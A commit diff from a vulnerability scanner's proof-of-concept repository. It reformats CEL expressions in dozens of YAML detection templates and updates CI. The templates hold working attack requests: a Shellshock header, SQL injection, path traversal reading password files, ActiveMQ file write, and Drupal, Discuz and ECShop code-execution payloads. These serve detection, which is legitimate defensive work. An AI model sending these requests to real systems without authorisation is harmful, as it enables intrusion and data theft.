修正 cel 表达式格式 (chaitin#562)

saitutiyu · Nov 22, 2019 · ede9b43 · ede9b43
1 parent 6a5190e
commit ede9b43
Show file tree

Hide file tree

Showing 98 changed files with 335 additions and 169 deletions.
diff --git a/.travis.yml b/.travis.yml
@@ -1,11 +1,16 @@
-language: python
+language: go
 install:
-  - pip install -U pip
-  - pip install pyyaml rfc3987 jsonschema yamllint requests
+  - sudo apt update
+  - sudo apt install -y python3-pip python3-setuptools
+  - pip3 install pyyaml rfc3987 jsonschema yamllint requests
 jobs:
   include:
     - stage: check_poc
       script: 
         - git remote set-branches --add origin master
         - git fetch
-        - python tests/tests.py
+        - python3 tests/tests.py
+        - cd tests/cellint
+        - export GO111MODULE=on
+        - go mod download
+        - go run cmd/cellint.go $(find ../../pocs -name "*.yml")
diff --git a/docs/configration/cli.md b/docs/configration/cli.md
@@ -116,7 +116,7 @@ OPTIONS:
 
 #### 配置扫描插件
 
-`--plugins` 配置本次扫描启用哪些插件, 不将使用配置文件中的配置
+`--plugins` 配置本次扫描启用哪些插件, 不再使用配置文件中的配置
 
 ```
 --plugins xss

diff --git a/pocs/activemq-cve-2016-3088.yml b/pocs/activemq-cve-2016-3088.yml
@@ -8,26 +8,26 @@ rules:
     body: |
       {{fileContent}}
     expression: |
-      response.status==204
+      response.status == 204
   - method: GET
     path: /admin/test/index.jsp
     search: |
       activemq.home=(?P<home>.*?),
     follow_redirects: false
     expression: |
-      response.status==200
+      response.status == 200
   - method: MOVE
     path: /fileserver/{{filename}}.txt
     headers:
       Destination: "file://{{home}}/webapps/api/{{filename}}.jsp"
     follow_redirects: false
     expression: |
-      response.status==204
+      response.status == 204
   - method: GET
     path: /api/{{filename}}.jsp
     follow_redirects: false
     expression: |
-      response.status==200 && response.body.bcontains(bytes(fileContent))
+      response.status == 200 && response.body.bcontains(bytes(fileContent))
 detail:
   author: j4ckzh0u(https://github.com/j4ckzh0u)
   links:

diff --git a/pocs/bash-cve-2014-6271.yml b/pocs/bash-cve-2014-6271.yml
@@ -1,13 +1,13 @@
 name: poc-yaml-bash-cve-2014-6271
 set:
-  r1: randomInt(800000000, 1000000000)
-  r2: randomInt(800000000, 1000000000)
+  r1: randomInt(800000000,1000000000)
+  r2: randomInt(800000000,1000000000)
 rules:
   - method: GET
     headers:
       User-Agent: "() { :; }; echo; echo; /bin/bash -c 'expr {{r1}} + {{r2}}'"
     follow_redirects: false
-    expression: response.body.bcontains(bytes(string(r1+r2)))
+    expression: response.body.bcontains(bytes(string(r1 + r2)))
 detail:
   author: neal1991(https://github.com/neal1991)
   links:

diff --git a/pocs/cacti-weathermap-file-write.yml b/pocs/cacti-weathermap-file-write.yml
@@ -8,7 +8,7 @@ rules:
   - method: GET
     path: /plugins/weathermap/configs/test.php
     follow_redirects: false
-    expression: response.status==200 && response.body.bcontains(b'46ea1712d4b13b55b3f680cc5b8b54e8')
+    expression: response.status == 200 && response.body.bcontains(b"46ea1712d4b13b55b3f680cc5b8b54e8")
 detail:
   author: whynot(https://github.com/notwhy)
   links:

diff --git a/pocs/coldfusion-cve-2010-2861-lfi.yml b/pocs/coldfusion-cve-2010-2861-lfi.yml
@@ -5,7 +5,7 @@ rules:
       /CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en
     follow_redirects: true
     expression: |
-      response.status==200 && response.body.bcontains(b'rdspassword=') && response.body.bcontains(b'encrypted=')
+      response.status == 200 && response.body.bcontains(b"rdspassword=") && response.body.bcontains(b"encrypted=")
 detail:
   version: 8.0, 8.0.1, 9.0, 9.0.1 and earlier versions
   author: sharecast

diff --git a/pocs/confluence-cve-2015-8399.yml b/pocs/confluence-cve-2015-8399.yml
@@ -3,7 +3,7 @@ rules:
   - method: GET
     path: /spaces/viewdefaultdecorator.action?decoratorName
     follow_redirects: false
-    expression: response.status==200 && response.body.bcontains(b'confluence-init.properties') && response.body.bcontains(b'View Default Decorator')
+    expression: response.status == 200 && response.body.bcontains(b"confluence-init.properties") && response.body.bcontains(b"View Default Decorator")
 detail:
   author: whynot(https://github.com/notwhy)
   links:

diff --git a/pocs/confluence-cve-2019-3396-lfi.yml b/pocs/confluence-cve-2019-3396-lfi.yml
@@ -10,7 +10,7 @@ rules:
       {"contentId":"786458","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/test","width":"1000","height":"1000","_template":"../web.xml"}}}
     follow_redirects: true
     expression: |
-      response.status==200 && response.body.bcontains(b'<param-name>contextConfigLocation</param-name>')
+      response.status == 200 && response.body.bcontains(b"<param-name>contextConfigLocation</param-name>")
 detail:
   author: sharecast
   links:

diff --git a/pocs/coremail-cnvd-2019-16798.yml b/pocs/coremail-cnvd-2019-16798.yml
@@ -5,7 +5,7 @@ rules:
       /mailsms/s?func=ADMIN:appState&dumpConfig=/
     follow_redirects: false
     expression: >
-      response.status==200 && response.body.bcontains(b'<object name="cm_md_db">')
+      response.status == 200 && response.body.bcontains(bytes("<object name=\"cm_md_db\">"))
 detail:
   author: cc_ci(https://github.com/cc8ci)
   links:

diff --git a/pocs/couchdb-cve-2017-12635.yml b/pocs/couchdb-cve-2017-12635.yml
@@ -17,7 +17,7 @@ rules:
       }
     follow_redirects: false
     expression: |
-      response.status==201
+      response.status == 201
 detail:
   author: j4ckzh0u(https://github.com/j4ckzh0u)
   links:

diff --git a/pocs/couchdb-unauth.yml b/pocs/couchdb-unauth.yml
@@ -4,9 +4,7 @@ rules:
     path: /_config
     follow_redirects: false
     expression: >
-      response.status == 200 && response.body.bcontains(b'httpd_design_handlers') &&
-      response.body.bcontains(b'external_manager') &&
-      response.body.bcontains(b'replicator_manager')
+      response.status == 200 && response.body.bcontains(b"httpd_design_handlers") && response.body.bcontains(b"external_manager") && response.body.bcontains(b"replicator_manager")
 detail:
   author: FiveAourThe(https://github.com/FiveAourThe)
   links:

diff --git a/pocs/dedecms-url-redirection.yml b/pocs/dedecms-url-redirection.yml
@@ -5,7 +5,7 @@ rules:
       /plus/download.php?open=1&link=aHR0cHM6Ly93d3cuZHUxeDNyMTIuY29t
     follow_redirects: false
     expression: >
-      response.status==302 && response.headers['location']=="https://www.du1x3r12.com"
+      response.status == 302 && response.headers["location"] == "https://www.du1x3r12.com"
 detail:
   author: cc_ci(https://github.com/cc8ci)
   Affected Version: "V5.7 sp1"

diff --git a/pocs/discuz-ml3x-cnvd-2019-22239.yml b/pocs/discuz-ml3x-cnvd-2019-22239.yml
@@ -1,12 +1,12 @@
 name: poc-yaml-discuz-ml3x-cnvd-2019-22239
 set:
-  r1: randomInt(800000000, 1000000000)
+  r1: randomInt(800000000,1000000000)
 rules:
   - method: GET
     path: /forum.php
     follow_redirects: false
     expression: |
-      response.status==200
+      response.status == 200
     search: cookiepre = '(?P<token>[\w_]+)'
   - method: GET
     path: /forum.php

diff --git a/pocs/discuz-v7-rce.yml b/pocs/discuz-v7-rce.yml
@@ -1,6 +1,6 @@
 name: poc-yaml-discuz-wooyun-2010-080723
 set:
-  rand: randomInt(200000000, 210000000)
+  rand: randomInt(200000000,210000000)
 rules:
   - method: GET
     path: >-
@@ -9,7 +9,7 @@ rules:
       Cookie: GLOBALS%5B_DCACHE%5D%5Bsmilies%5D%5Bsearcharray%5D=/.*/eui; GLOBALS%5B_DCACHE%5D%5Bsmilies%5D%5Breplacearray%5D=print_r(md5({{rand}}));
     follow_redirects: false
     expression: |
-      response.status==200 && response.body.bcontains(bytes(md5(string(rand))))
+      response.status == 200 && response.body.bcontains(bytes(md5(string(rand))))
 detail:
   version: Discuz 7.x/6.x
   author: Loneyer

diff --git a/pocs/discuz-v72-sqli.yml b/pocs/discuz-v72-sqli.yml
@@ -5,8 +5,7 @@ rules:
       /faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat((select%20concat(user,0x3a,md5(1234),0x3a)%20from%20mysql.user%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23
     follow_redirects: false
     expression: >
-      response.status==200 && response.body.bcontains(b'81dc9bdb52d04dc20036dbd8313ed055') &&
-      response.body.bcontains(b'Discuz! info</b>: MySQL Query Error')
+      response.status == 200 && response.body.bcontains(b"81dc9bdb52d04dc20036dbd8313ed055") && response.body.bcontains(b"Discuz! info</b>: MySQL Query Error")
 detail:
   author: leezp
   Affected Version: "discuz <=v7.2"

diff --git a/pocs/discuz-wechat-plugins-unauth.yml b/pocs/discuz-wechat-plugins-unauth.yml
@@ -4,7 +4,7 @@ rules:
     path: '/plugin.php?id=wechat:wechat&ac=wxregister'
     follow_redirects: false
     expression: |
-      response.status==302 && 'set-cookie' in response.headers && response.headers['set-cookie'].contains('auth') && 'location' in response.headers && response.headers['location'].contains('wsq.discuz.com')
+      response.status == 302 && "set-cookie" in response.headers && response.headers["set-cookie"].contains("auth") && "location" in response.headers && response.headers["location"].contains("wsq.discuz.com")
 detail:
   author: JrD
   links:

diff --git a/pocs/dlink-850l-info-leak.yml b/pocs/dlink-850l-info-leak.yml
@@ -9,7 +9,7 @@ rules:
       <?xml version="1.0" encoding="utf-8"?><postxml><module><service>../../../htdocs/webinc/getcfg/DEVICE.ACCOUNT.xml</service></module></postxml>
     follow_redirects: false
     expression: >
-      response.status == 200 && response.body.bcontains(b'</usrid>') && response.body.bcontains(b'</password>') && response.body.bcontains(b'<result>OK</result>')
+      response.status == 200 && response.body.bcontains(b"</usrid>") && response.body.bcontains(b"</password>") && response.body.bcontains(b"<result>OK</result>")
 detail:
   author: cc_ci(https://github.com/cc8ci)
   Affected Version: "Dir-850L"

diff --git a/pocs/dlink-cve-2019-17506.yml b/pocs/dlink-cve-2019-17506.yml
@@ -7,7 +7,7 @@ rules:
     body: SERVICES=DEVICE.ACCOUNT&AUTHORIZED_GROUP=1%0a
     follow_redirects: false
     expression: >
-      response.status == 200 && response.body.bcontains(b'<name>') && response.body.bcontains(b'<password>')
+      response.status == 200 && response.body.bcontains(b"<name>") && response.body.bcontains(b"<password>")
 detail:
   author: l1nk3r,Huasir(https://github.com/dahua966/)
   links:

diff --git a/pocs/docker-api-unauthorized-rce.yml b/pocs/docker-api-unauthorized-rce.yml
@@ -4,7 +4,7 @@ rules:
     path: /info
     follow_redirects: false
     expression: |
-      response.status==200 && response.body.bcontains(b'KernelVersion') && response.body.bcontains(b'RegistryConfig') && response.body.bcontains(b'DockerRootDir')
+      response.status == 200 && response.body.bcontains(b"KernelVersion") && response.body.bcontains(b"RegistryConfig") && response.body.bcontains(b"DockerRootDir")
 
 detail:
   author: j4ckzh0u(https://github.com/j4ckzh0u)

diff --git a/pocs/docker-registry-unauthorized-access.yml b/pocs/docker-registry-unauthorized-access.yml
@@ -4,13 +4,12 @@ rules:
     path: /v2/
     follow_redirects: false
     expression: >
-      response.status==200 && 'docker-distribution-api-version' in response.headers && response.headers['docker-distribution-api-version'].contains('registry/2.0')
+      response.status == 200 && "docker-distribution-api-version" in response.headers && response.headers["docker-distribution-api-version"].contains("registry/2.0")
   - method: GET
     path: /v2/_catalog
     follow_redirects: false
     expression: >
-      response.status==200 && response.content_type.contains('application/json') &&
-      response.body.bcontains(b'repositories')
+      response.status == 200 && response.content_type.contains("application/json") && response.body.bcontains(b"repositories")
 detail:
   author: p0wd3r
   links:

diff --git a/pocs/druid-monitor-unauth.yml b/pocs/druid-monitor-unauth.yml
@@ -3,7 +3,7 @@ rules:
   - method: GET
     path: /druid/index.html
     expression: |
-      response.status == 200 && response.body.bcontains(b'Druid Stat Index') && response.body.bcontains(b'DruidVersion') && response.body.bcontains(b'DruidDrivers')
+      response.status == 200 && response.body.bcontains(b"Druid Stat Index") && response.body.bcontains(b"DruidVersion") && response.body.bcontains(b"DruidDrivers")
 detail:
   author: met7or
   links:

diff --git a/pocs/drupal-cve-2019-6340.yml b/pocs/drupal-cve-2019-6340.yml
@@ -25,7 +25,7 @@ rules:
       }
     follow_redirects: true
     expression: |
-      response.status==403&&response.body.bcontains(bytes(r1 + "%" + r2))
+      response.status == 403 && response.body.bcontains(bytes(r1 + "%" + r2))
 detail:
   author: thatqier
   links:

diff --git a/pocs/drupal-drupal7geddon2-rce.yml b/pocs/drupal-drupal7geddon2-rce.yml
@@ -12,15 +12,15 @@ rules:
     search: |
       name="form_build_id"\s+value="(?P<build_id>.+?)"
     expression: |
-      response.status==200
+      response.status == 200
   - method: POST
     path: "/?q=file%2Fajax%2Fname%2F%23value%2F{{build_id}}"
     headers:
       Content-Type: application/x-www-form-urlencoded
     body: |
       form_build_id={{build_id}}
     expression: |
-      response.body.bcontains(bytes(r1+'%'+r2))
+      response.body.bcontains(bytes(r1 + "%" + r2))
 detail:
   drupal_version: 7
   links:

diff --git a/pocs/drupal-drupal8geddon2-rce.yml b/pocs/drupal-drupal8geddon2-rce.yml
@@ -10,7 +10,7 @@ rules:
     body: |
       form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=printf&mail[#type]=markup&mail[#markup]={{r1}}%25%25{{r2}}
     expression: |
-      response.body.bcontains(bytes(r1+'%'+r2))
+      response.body.bcontains(bytes(r1 + "%" + r2))
 detail:
   drupal_version: 8
   links:

diff --git a/pocs/drupal-geddon-cve-2014-3704-sqli.yml b/pocs/drupal-geddon-cve-2014-3704-sqli.yml
@@ -7,7 +7,7 @@ rules:
       updatexml(0x23,concat(1,md5(666)),1)%23]=bob&name[0]=a
     follow_redirects: false
     expression: |
-      response.status == 500 && response.body.bcontains(b'PDOException') && response.body.bcontains(b'fae0b27c451c728867a567e8c1bb4e53')
+      response.status == 500 && response.body.bcontains(b"PDOException") && response.body.bcontains(b"fae0b27c451c728867a567e8c1bb4e53")
 detail:
   Affected Version: "Drupal < 7.32"
   links:

diff --git a/pocs/dvr-cve-2018-9995.yml b/pocs/dvr-cve-2018-9995.yml
@@ -7,7 +7,7 @@ rules:
       Cookie: uid=admin
     follow_redirects: true
     expression: >
-      response.status==200 && response.body.bcontains(b'"uid":') && response.body.bcontains(b'playback')
+      response.status == 200 && response.body.bcontains(bytes("\"uid\":")) && response.body.bcontains(b"playback")
 detail:
   author: cc_ci(https://github.com/cc8ci)
   Affected Version: "DVR"

diff --git a/pocs/ecology-filedownload-directory-traversal.yml b/pocs/ecology-filedownload-directory-traversal.yml
@@ -4,7 +4,7 @@ rules:
     path: /weaver/ln.FileDownload?fpath=../ecology/WEB-INF/web.xml
     follow_redirects: false
     expression: |
-      response.status == 200 && response.body.bcontains(b'<url-pattern>/weaver/')
+      response.status == 200 && response.body.bcontains(b"<url-pattern>/weaver/")
 detail:
   author: l1nk3r
   links:

diff --git a/pocs/ecology-javabeanshell-rce.yml b/pocs/ecology-javabeanshell-rce.yml
@@ -1,15 +1,15 @@
 name: poc-yaml-ecology-javabeanshell-rce
 set:
-  r1: randomInt(40000, 44800)
-  r2: randomInt(40000, 44800)
+  r1: randomInt(40000,44800)
+  r2: randomInt(40000,44800)
 rules:
   - method: POST
     path: /weaver/bsh.servlet.BshServlet
     body: >-
       bsh.script=print%28{{r1}}*{{r2}}%29&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw
     follow_redirects: false
     expression: |
-      response.status==200 && response.body.bcontains(bytes(string(r1*r2)))
+      response.status == 200 && response.body.bcontains(bytes(string(r1 * r2)))
 detail:
   author: l1nk3r
   links:

diff --git a/pocs/ecology-springframework-directory-traversal.yml b/pocs/ecology-springframework-directory-traversal.yml
@@ -4,7 +4,7 @@ rules:
     path: /weaver/org.springframework.web.servlet.ResourceServlet?resource=/WEB-INF/web.xml
     follow_redirects: false
     expression: |
-      response.status == 200 && response.body.bcontains(b'<url-pattern>/weaver/')
+      response.status == 200 && response.body.bcontains(b"<url-pattern>/weaver/")
 detail:
   author: l1nk3r
   links:

diff --git a/pocs/ecology-workflowcentertreedata-sqli.yml b/pocs/ecology-workflowcentertreedata-sqli.yml
@@ -11,7 +11,7 @@ rules:
       formids=11111111111)))%0a%0dunion%20select%20NULL,concat('{{r1}}','{{r2}}')%20from%20v$parameter%20order%20by%20(((1
     follow_redirects: true
     expression: |
-      response.status == 200 && response.body.bcontains(bytes(r1+r2))
+      response.status == 200 && response.body.bcontains(bytes(r1 + r2))
 detail:
   author: JingLing(https://hackfun.org/)
   links:

diff --git a/pocs/ecshop-360-rce.yml b/pocs/ecshop-360-rce.yml
@@ -1,7 +1,7 @@
 name: poc-yaml-ecshop-360-rce
 set:
-  r1: randomInt(40000, 44800)
-  r2: randomInt(40000, 44800)
+  r1: randomInt(40000,44800)
+  r2: randomInt(40000,44800)
 rules:
   - method: POST
     path: /user.php
@@ -13,7 +13,7 @@ rules:
       Content-Type: application/x-www-form-urlencoded
     body: action=login&vulnspy=printf(r1*r2);
     follow_redirects: false
-    expression: response.status == 200 && response.body.bcontains(bytes(string(r1*r2)))
+    expression: response.status == 200 && response.body.bcontains(bytes(string(r1 * r2)))
 detail:
   author: githusky
   links: